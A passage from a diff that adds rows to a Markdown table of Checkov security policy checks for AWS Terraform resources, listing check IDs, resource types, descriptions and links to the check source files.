+|  518 | CKV_AWS_371     | resource | aws_sagemaker_notebook_instance                         | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2                                                                                                                                         | Terraform | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py)                                                     |
+|  519 | CKV_AWS_372     | resource | aws_sagemaker_flow_definition                           | Ensure Amazon SageMaker Flow Definition uses KMS for output configurations                                                                                                                               | Terraform | [SagemakerFlowDefinitionUsesKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py)                                                                   |
+|  520 | CKV_AWS_373     | resource | aws_bedrockagent_agent                                  | Ensure Bedrock Agent is encrypted with a CMK                                                                                                                                                             | Terraform | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py)                                                                                     |
+|  521 | CKV2_AWS_1      | resource | aws_network_acl                                         | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                               |
+|  522 | CKV2_AWS_1      | resource | aws_subnet                                              | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                               |
+|  523 | CKV2_AWS_2      | resource | aws_ebs_volume                                          | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                             |
+|  524 | CKV2_AWS_2      | resource | aws_volume_attachment                                   | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                             |
+|  525 | CKV2_AWS_3      | resource | aws_guardduty_detector                                  | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                                   |
+|  526 | CKV2_AWS_3      | resource | aws_guardduty_organization_configuration                | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                                   |
+|  527 | CKV2_AWS_4      | resource | aws_api_gateway_method_settings                         | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                                     |
+|  528 | CKV2_AWS_4      | resource | aws_api_gateway_stage                                   | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                                     |
+|  529 | CKV2_AWS_5      | resource | aws_security_group                                      | Ensure that Security Groups are attached to another resource                                                                                                                                             | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml)                                                                               |
+|  530 | CKV2_AWS_6      | resource | aws_s3_bucket                                           | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                               |
+|  531 | CKV2_AWS_6      | resource | aws_s3_bucket_public_access_block                       | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                               |
+|  532 | CKV2_AWS_7      | resource | aws_emr_cluster                                         | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                               |
+|  533 | CKV2_AWS_7      | resource | aws_security_group                                      | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                               |
+|  534 | CKV2_AWS_8      | resource | aws_rds_cluster                                         | Ensure that RDS clusters has backup plan of AWS Backup                                                                                                                                                   | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml)                                                                         |
+|  535 | CKV2_AWS_9      | resource | aws_backup_selection                                    | Ensure that EBS are added in the backup plans of AWS Backup                                                                                                                                              | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml)                                                                                           |
+|  536 | CKV2_AWS_10     | resource | aws_cloudtrail                                          | Ensure CloudTrail trails are integrated with CloudWatch Logs                                                                                                                                             | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml)                                                                         |
+|  537 | CKV2_AWS_11     | resource | aws_vpc                                                 | Ensure VPC flow logging is enabled in all VPCs                                                                                                                                                           | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml)                                                                                             |
+|  538 | CKV2_AWS_12     | resource | aws_default_security_group                              | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                                   |
+|  539 | CKV2_AWS_12     | resource | aws_vpc                                                 | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                                   |
+|  540 | CKV2_AWS_14     | resource | aws_iam_group                                           | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                                     |
+|  541 | CKV2_AWS_14     | resource | aws_iam_group_membership                                | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                                     |
+|  542 | CKV2_AWS_15     | resource | aws_autoscaling_group                                   | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                           |
+|  543 | CKV2_AWS_15     | resource | aws_elb                                                 | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                           |
+|  544 | CKV2_AWS_15     | resource | aws_lb_target_group                                     | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                           |
+|  545 | CKV2_AWS_16     | resource | aws_appautoscaling_target                               | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                                     |
+|  546 | CKV2_AWS_16     | resource | aws_dynamodb_table                                      | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                                     |
+|  547 | CKV2_AWS_18     | resource | aws_backup_selection                                    | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup                                                                                                    | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml)                                                                                           |
+|  548 | CKV2_AWS_19     | resource | aws_eip                                                 | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                               |
+|  549 | CKV2_AWS_19     | resource | aws_eip_association                                     | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                               |
+|  550 | CKV2_AWS_20     | resource | aws_alb                                                 | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
+|  551 | CKV2_AWS_20     | resource | aws_alb_listener                                        | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
+|  552 | CKV2_AWS_20     | resource | aws_lb                                                  | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
+|  553 | CKV2_AWS_20     | resource | aws_lb_listener                                         | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
+|  554 | CKV2_AWS_21     | resource | aws_iam_group_membership                                | Ensure that all IAM users are members of at least one IAM group.                                                                                                                                         | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml)                                                     |
+|  555 | CKV2_AWS_22     | resource | aws_iam_user                                            | Ensure an IAM User does not have access to the console                                                                                                                                                   | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml)                                                                     |
+|  556 | CKV2_AWS_23     | resource | aws_route53_record                                      | Route53 A Record has Attached Resource                                                                                                                                                                   | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml)                                                           |
+|  557 | CKV2_AWS_27     | resource | aws_rds_cluster                                         | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                                     |
+|  558 | CKV2_AWS_27     | resource | aws_rds_cluster_parameter_group                         | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                                     |
+|  559 | CKV2_AWS_28     | resource | aws_alb                                                 | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                                     |
+|  560 | CKV2_AWS_28     | resource | aws_lb                                                  | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                                     |
+|  561 | CKV2_AWS_29     | resource | aws_api_gateway_rest_api                                | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                                     |
+|  562 | CKV2_AWS_29     | resource | aws_api_gateway_stage                                   | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                                     |
+|  563 | CKV2_AWS_30     | resource | aws_db_instance                                         | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                                       |
+|  564 | CKV2_AWS_30     | resource | aws_db_parameter_group                                  | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                                       |
+|  565 | CKV2_AWS_31     | resource | aws_wafv2_web_acl                                       | Ensure WAF2 has a Logging Configuration                                                                                                                                                                  | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml)                                                                                                 |
+|  566 | CKV2_AWS_32     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution has a response headers policy attached                                                                                                                                    | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml)                                                   |
+|  567 | CKV2_AWS_33     | resource | aws_appsync_graphql_api                                 | Ensure AppSync is protected by WAF                                                                                                                                                                       | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml)                                                                             |
+|  568 | CKV2_AWS_34     | resource | aws_ssm_parameter                                       | AWS SSM Parameter should be Encrypted                                                                                                                                                                    | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml)                                                       |
+|  569 | CKV2_AWS_35     | resource | aws_route                                               | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                           |
+|  570 | CKV2_AWS_35     | resource | aws_route_table                                         | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                           |
+|  571 | CKV2_AWS_36     | resource | aws_ssm_parameter                                       | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                         |
+|  572 | CKV2_AWS_36     | resource | data.http                                               | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                         |
+|  573 | CKV2_AWS_37     | resource | aws                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  574 | CKV2_AWS_37     | resource | aws_accessanalyzer_analyzer                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  575 | CKV2_AWS_37     | resource | aws_acm_certificate                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  576 | CKV2_AWS_37     | resource | aws_acm_certificate_validation                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  577 | CKV2_AWS_37     | resource | aws_acmpca_certificate_authority                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  578 | CKV2_AWS_37     | resource | aws_ami                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  579 | CKV2_AWS_37     | resource | aws_ami_copy                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  580 | CKV2_AWS_37     | resource | aws_ami_from_instance                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  581 | CKV2_AWS_37     | resource | aws_ami_launch_permission                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  582 | CKV2_AWS_37     | resource | aws_api_gateway_account                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  583 | CKV2_AWS_37     | resource | aws_api_gateway_api_key                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  584 | CKV2_AWS_37     | resource | aws_api_gateway_authorizer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  585 | CKV2_AWS_37     | resource | aws_api_gateway_base_path_mapping                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  586 | CKV2_AWS_37     | resource | aws_api_gateway_client_certificate                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  587 | CKV2_AWS_37     | resource | aws_api_gateway_deployment                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  588 | CKV2_AWS_37     | resource | aws_api_gateway_documentation_part                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  589 | CKV2_AWS_37     | resource | aws_api_gateway_documentation_version                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  590 | CKV2_AWS_37     | resource | aws_api_gateway_domain_name                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  591 | CKV2_AWS_37     | resource | aws_api_gateway_gateway_response                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  592 | CKV2_AWS_37     | resource | aws_api_gateway_integration                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  593 | CKV2_AWS_37     | resource | aws_api_gateway_integration_response                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  594 | CKV2_AWS_37     | resource | aws_api_gateway_method                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  595 | CKV2_AWS_37     | resource | aws_api_gateway_method_response                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  596 | CKV2_AWS_37     | resource | aws_api_gateway_method_settings                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  597 | CKV2_AWS_37     | resource | aws_api_gateway_model                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  598 | CKV2_AWS_37     | resource | aws_api_gateway_request_validator                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  599 | CKV2_AWS_37     | resource | aws_api_gateway_resource                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  600 | CKV2_AWS_37     | resource | aws_api_gateway_rest_api                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  601 | CKV2_AWS_37     | resource | aws_api_gateway_stage                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  602 | CKV2_AWS_37     | resource | aws_api_gateway_usage_plan                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  603 | CKV2_AWS_37     | resource | aws_api_gateway_usage_plan_key                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  604 | CKV2_AWS_37     | resource | aws_api_gateway_vpc_link                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  605 | CKV2_AWS_37     | resource | aws_apigatewayv2_api                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  606 | CKV2_AWS_37     | resource | aws_apigatewayv2_api_mapping                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  607 | CKV2_AWS_37     | resource | aws_apigatewayv2_authorizer                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  608 | CKV2_AWS_37     | resource | aws_apigatewayv2_deployment                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  609 | CKV2_AWS_37     | resource | aws_apigatewayv2_domain_name                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
